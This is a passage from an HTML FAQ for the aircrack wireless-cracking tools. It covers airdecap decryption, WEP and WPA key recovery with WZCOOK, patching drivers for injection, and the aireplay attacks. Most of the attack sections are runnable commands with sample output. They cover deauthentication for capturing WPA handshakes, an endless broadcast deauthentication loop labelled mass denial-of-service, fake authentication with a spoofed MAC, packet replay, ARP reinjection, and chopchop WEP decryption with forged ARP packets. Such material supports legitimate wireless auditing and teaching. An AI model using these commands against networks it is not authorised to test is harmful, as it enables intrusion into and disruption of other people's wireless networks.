  <LI>Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.<BR>&nbsp;
  <LI>If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static (EAP/802.1X in use ?).<BR>&nbsp;
  <LI>A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental bruteforce attacks (-x / -y).
</UL>
</BLOCKQUOTE>

<P><A NAME="q150" HREF="#q150">I've found the key, how do I decrypt a capture file ?</A>

<BLOCKQUOTE>
You may use the <FONT FACE="Courier">airdecap</FONT> program:
<P><PRE>  usage: airdecap [options] &lt;pcap file&gt;

      -l       : don't remove the 802.11 header
      -b bssid : access point MAC address filter
      -k pmk   : WPA Pairwise Master Key in hex
      -e essid : target network ascii identifier
      -p pass  : target network WPA passphrase
      -w key   : target network WEP key in hex

  examples:

  airdecap -b 00:09:5B:10:BC:5A open-network.cap
  airdecap -w 11A3E229084349BC25D97E2939 wep.cap
  airdecap -e 'the ssid' -p passphrase  tkip.cap</PRE>
</BLOCKQUOTE>

<P><A NAME="q160" HREF="#q160">How do I recover my WEP key in Windows ?</A>

<BLOCKQUOTE>
You may use the WZCOOK program which recovers WEP keys from XP's Wireless
Zero Configuration utility. This is experimental software, so it may or may
not work depending on your service pack level.
</BLOCKQUOTE>

<P><A NAME="q170" HREF="#q170">Does WZCOOK also recovers WPA keys ?</A>

<BLOCKQUOTE>
WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is
the result of the passphrase hashed 8192 times together with the ESSID and
the ESSID length. The passphrase itself can't be recovered -- however,
knowing the PMK is enough to connect to a WPA-protected wireless network with
<A HREF="http://100h.org/wlan/winxp/wpa_supplicant.zip">wpa_supplicant</A>
(see the <A HREF="http://100h.org/wlan/winxp/wpa_supplicant.txt">Windows README</A>).

Your <FONT FACE="Courier">wpa_supplicant.conf</FONT> configuration file
should look like:

<P><FONT FACE="Courier">network={
<BR>&nbsp;&nbsp;&nbsp;&nbsp;ssid="my_essid"
<BR>&nbsp;&nbsp;&nbsp;&nbsp;pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
<BR>}</FONT>
</BLOCKQUOTE>

<P><A NAME="q180" HREF="#q180">How do I patch the driver for injection with aireplay ?</A>

<BLOCKQUOTE>
As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC),
Atheros, RTL8180 and Ralink. <B>Injection on Centrino, Hermes, ACX1xx,
Aironet, ZyDAS, Marvell and Broadcom is not supported because of firmware
and/or driver limitations.</B>

<P>Injection on Prism2 and Atheros is still pretty much experimental; if your
card appears to hang (no packets captured or injected), disable the interface,
reload the drivers and re-insert the card. Also consider updating the
firmware (if Prism2).

<P>All drivers must be patched so as to support injection in Monitor mode.
You will need linux headers that match your current running kernel; if not,
you will have to download the linux source and compile a custom kernel.

<P>If you have trouble patching and compiling stuff,
you may want to use the <A HREF="http://troppix.net/">Troppix LiveCD</A>,
which includes patched device drivers.

<P><UL>
<LI>Installing the madwifi driver (Atheros cards)

<P><B>Note 1:</B> you'll need uudecode from the sharutils package.
<P><B>Note 2:</B> the 20051025 patch should also work with newer version
of the madwifi CVS.
<P><B>Note 3:</B> if you use wpa_supplicant, you should recompile it
(older versions are not compatible with the current madwifi CVS), and make
sure <FONT FACE="Courier">CONFIG_DRIVER_MADWIFI=y</FONT> is uncommented
in config.h.
<P><B>Note 4:</B> with the current madwifi, it is no longer needed
to run "<FONT FACE="Courier">iwpriv ath0 mode 2</FONT>", since the driver
allows injection in mode 0 using the new athXraw interface.

<P><CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0">
<TR><TH>Allowed modes</TH><TH>Physical medium</TH></TR>
<TR><TD>Mode 0</TD><TD>Automatic (a/b/g)</TD></TR>
<TR><TD>Mode 1</TD><TD>802.11a only</TD></TR>
<TR><TD>Mode 2</TD><TD>802.11b only</TD></TR>
<TR><TD>Mode 3</TD><TD>802.11g only</TD></TR>
</TABLE></CENTER>

<P><PRE>ifconfig ath0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe \
      ath_pci wlan ath_hal 2&gt;/dev/null

find /lib/modules -name 'ath*'  -exec rm -v {} \; 2&gt;/dev/null
find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null
cd /usr/src
wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20051025.tgz
wget http://100h.org/wlan/linux/patches/madwifi-cvs-20051025.patch
tar -xvzf madwifi-cvs-20051025.tgz
cd madwifi-cvs-20051025
patch -Np1 -i ../madwifi-cvs-20051025.patch
make KERNELPATH=/usr/src/linux-&lt;insert version&gt;
make install
modprobe ath_pci</PRE>

<P>It is now possible to set the transmit rate with madwifi (and also
rt2570). The recommended rate is 5.5 Mbps, but you can lower it or raise
it, depending on your distance from the AP. For example:
<P><PRE>iwconfig ath0 rate 24M</PRE>

<P><CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0">
<TR><TH>Modulation</TH><TH>Allowed rates</TH></TR>
<TR><TD>DSSS / CCK</TD><TD>1M, 2M, 5.5M, 11M</TD></TR>
<TR><TD>OFDM (a/g)</TD><TD>6M, 9M, 12M, 24M, 36M, 48M, 54M</TD></TR>
</TABLE></CENTER>

<P>When using attacks 2, 3 and 4, changing the number of packets per
second sent by aireplay (option -x) sometimes helps getting better results;
the default is 500 pps.

<P><LI>Installing the prism54 driver (PrismGT FullMAC cards)
<P><PRE>
ifconfig eth1 down
rmmod prism54

cd /usr/src
wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
tar -xvzf prism54-svn-20050724.tgz
cd prism54-svn-20050724
patch -Np1 -i ../prism54-svn-20050724.patch
make modules &amp;&amp; make install
wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
depmod -a</PRE>

<P><LI>Installing the HostAP driver (Prism2 cards)
<P><PRE>ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/CardBus stop
rmmod prism2_pci
rmmod hostap_pci

cd /usr/src
wget http://100h.org/wlan/linux/prism2/hostap-driver-0.4.5.tar.gz
wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
tar -xvzf hostap-driver-0.4.5.tar.gz
cd hostap-driver-0.4.5
patch -Np1 -i ../hostap-driver-0.3.9.patch
make &amp;&amp; make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
/etc/init.d/pcmcia start
modprobe hostap_pci &amp;&gt;/dev/null</PRE>

<P><LI>Installing the wlan-ng driver (Prism2 cards)

<P><B>Important note:</B> when the card is inserted, wlan-ng will flash the
firmware in RAM (volatile download) with versions PRI 1.1.4 and STA 1.8.3.
Many users experienced problems with this operation, so in any case it's
safer to just use hostap instead. Furthermore, HostAP works more reliably
and supports iwconfig whereas wlan-ng doesn't.

<P><PRE>ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia stop
rmmod prism2_pci
rmmod hostap_pci
find /lib/modules \( -name p80211* -o -name prism2* \) \
    -exec rm -v {} \;

cd /usr/src
wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
tar -xvzf wlanng-0.2.1-pre26.tar.gz
cd wlanng-0.2.1-pre26
patch -Np1 -i ../wlanng-0.2.1-pre26.patch
make config &amp;&amp; make all &amp;&amp; make install
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
/etc/init.d/pcmcia start
modprobe prism2_pci &amp;&gt;/dev/null</PRE>

<P><LI>Installing the r8180-sa2400 driver (RTL8180 cards)
<P><PRE>ifconfig wlan0 down
rmmod r8180

cd /usr/src
wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
tar -xvzf rtl8180-0.21.tar.gz
cd rtl8180-0.21
patch -Np1 -i ../rtl8180-0.21.patch
make &amp;&amp; make install
depmod -a
modprobe r8180</PRE>

<P><LI>Installing the rt2500 driver (Ralink b/g PCI/CardBus)
<P><PRE>ifconfig ra0 down
rmmod rt2500

cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20051112.tgz
tar -xvzf rt2500-cvs-20051112.tgz
cd rt2500-cvs-20051112
cd Module
make &amp;&amp; make install
modprobe rt2500</PRE>
<P> Make sure to load the driver with modprobe (not insmod) and to put the
card in Monitor mode before bringing the interface up.

<P><LI>Installing the rt2570 driver (Ralink b/g USB)
<P><PRE>ifconfig rausb0 down
rmmod rt2570

cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20051112.tgz
tar -xvzf rt2570-cvs-20051112.tgz
cd rt2570-cvs-20051112
cd Module
make &amp;&amp; make install
modprobe rt2570</PRE>
</UL>
</BLOCKQUOTE>

<P><A NAME="q188" HREF="#q188">The driver won't compile.</A>

<BLOCKQUOTE>
This usually happens because the linux headers don't match your current
running kernel. In this situation, just recompile a fresh kernel, install
it and reboot. Then, try again compiling the driver.

<P>See this <A HREF="http://www.tldp.org/HOWTO/Encrypted-Root-Filesystem-HOWTO/preparing-system.html">HOWTO</A> for more details about kernel compilation.
</BLOCKQUOTE>

<P><A NAME="q190" HREF="#q190">How do I use aireplay ?</A>

<BLOCKQUOTE>
If the driver was properly patched, aireplay is able to inject raw 802.11
packets in Monitor mode; it currently implements a set of five different
attacks.

<P>If you get "<FONT FACE="Courier">ioctl(SIOCGIFINDEX) failed: No
such device</FONT>", double check that your device name is correct
and that you haven't forgotten a parameter on the command line.

<P>In the following examples, 00:13:10:30:24:9C is the MAC address of the
access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of
a wireless client.

<P><UL>
<LI><A NAME="q191" HREF="#q191">Attack 0: deauthentication</A>
<P>This attack is mostly useful to recover a hidden (not broadcasted)
ESSID and for capturing WPA handshakes by forcing clients to reauthenticate.
It can also be used to generate ARP requests as Windows clients sometimes
flush their ARP cache when disconnected. Of course, this attack is totally
useless if there are no associated wireless clients.

<P><B>It is usually more effective to target a specific station using
the -c parameter.</B>

<P>Some examples:
<P><UL>
<LI>WPA Handshake capture with an Atheros
<P><PRE>airmon.sh start ath0
airodump ath0 out 6 &nbsp;<I>(switch to another console)</I>
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
<I>(wait for a few seconds)</I>
aircrack -w /path/to/dictionary out.cap</PRE>

<P><LI>ARP request generation with a Prism2 card
<P><PRE>airmon.sh start wlan0
airodump wlan0 out 6 &nbsp;<I>(switch to another console)</I>
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
</PRE>

<P>After sending the five batches of deauthentication packets, we start
listening for ARP requests with attack 3. The -h option is mandatory
and has to be the MAC address of an associated client.

<P>If the driver is wlan-ng, you must run the airmon.sh script;
otherwise the card won't be correctly setup for injection.

<P><LI>Mass denial-of-service with a RT2500 card
<P><PRE>airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0</PRE>

<P>With parameter 0, this attack will loop forever sending deauthentication
packets to the broadcast address, thus preventing clients from staying
connected.
</UL>

<P><LI><A NAME="q192" HREF="#q192">Attack 1: fake authentication</A>
<P>This attack is only useful when you need an associated MAC address
in attacks 2, 3, 4 (-h option) and there is currently no associated
client. <B>However it is genereally better to use the MAC address of a
real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4.
The fake auth attack does NOT generate ARP requests.</B>

<P>Also, subsequent attacks will likely perform better if you update the
MAC address of the card, so that it properly sends ACKs:

<P><PRE>ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)</PRE>

<P><CENTER><TABLE BORDER="2" CELLPADDING="5" CELLSPACING="1"><TR><TD>
With <U>patched</U> madwifi CVS 2005-08-14, it's possible to inject packets
while in Managed mode (the WEP key itself doesn't matter, as long as the AP
accepts Open-System authentication). So, instead of running attack 1, you
may just associate and inject / monitor through the athXraw interface:

<P><PRE>ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump ath0raw out 6</PRE>

<P>Then you can run attack 3 or 4 (aireplay will automatically replace
ath0 with ath0raw below):

<P><PRE>aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0</PRE></TD></TR></TABLE></CENTER>

<P>Some access points require to reassociate every 30 seconds, otherwise
our fake client is considered disconnected. In this case, setup the
periodic re-association delay:

<P><PRE>aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0</PRE>

<P>If this attacks seems to fail (aireplay keeps sending authentication
requests), MAC address filtering may be in place. Also make sure that:

<P><UL>
  <LI>You are close enough to the access point.
  <LI>The driver is properly patched and installed.
  <LI>The card is configured on the same channel as the AP.
  <LI>The BSSID and ESSID (-a / -e options) are correct.
  <LI>If Prism2, make sure the firmware was updated.
</UL>

<P>As a reminder: <B>you can't inject with a Centrino, Hermes,
ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware
and/or driver limitations.</B>

<P><LI><A NAME="q193" HREF="#q193">Attack 2: interactive packet replay</A>
<P>This attack allows you to choose a given packet for replaying; it
sometimes gives more effective results than attack 3 (automatic ARP
reinjection).

<P>You could use it, for example, to attempt the "any data re-broadcast"
attack, which only works if the AP actually reencrypts WEP data packets:

<P><PRE>aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
    -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0</PRE>

<P>You can also use attack 2 to manually replay WEP-encrypted ARP request
packets, which size is either 68 or 86 bytes (depending on the operating
system):

<P><PRE>aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
    -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
    -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0</PRE>

<P><LI><A NAME="q194" HREF="#q194">Attack 3: ARP-request reinjection</A>
<P>The classic ARP-request replay attack is the most effective to generate
new IVs, and works very reliably. You need either the MAC address of an
associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1
(00:11:22:33:44:55). You may have to wait for a couple of minutes, or even
longer, until an ARP request shows up; this attack will fail if there is no
traffic.

<P>Please note that you can also reuse ARP requests from a previous capture
using the -r switch.

<P><PRE>aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...</PRE>

<P><LI><A NAME="q195" HREF="#q195">Attack 4: KoreK's "chopchop" (CRC prediction)</A>
<P>This attack, when successful, can decrypt a WEP data packet without
knowing the key. It can even work against dynamic WEP. <I>This attack
does not recover the WEP key itself, but merely reveals the plaintext.</I>
However, most access points are not vulnerable at all. Some may seem
vulnerable at first but actually drop data packets shorter that 60 bytes.
This attack requires at least one WEP data packet.

<P><OL>
<LI>First, we decrypt one packet :
<P><PRE>aireplay -4 -h 00:09:5B:EB:C5:2B ath0</PRE>

<P><LI>Let's have a look at the IP address :
<P><PRE>tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
<B>IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1</B></PRE>

<P><LI>Then, forge an ARP request.
<P>The source IP (192.168.1.100) doesn't matter, but the destination IP
(192.168.1.2) must respond to ARP requests. The source MAC must belong to
an associated station.
<P><PRE>./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap</PRE>

<P><LI>And replay our forged ARP request :
<P><PRE>aireplay -2 -r arp.cap ath0</PRE>
</OL>
</UL>
</BLOCKQUOTE>

<HR NOSHADE>
<BLOCKQUOTE><B>Finally, I'd like to thank all the many, many people who
contributed to aircrack... you know who you are :-)</B></BLOCKQUOTE>
<HR NOSHADE>

</TD></TR></TABLE>
</BODY>
</HTML>
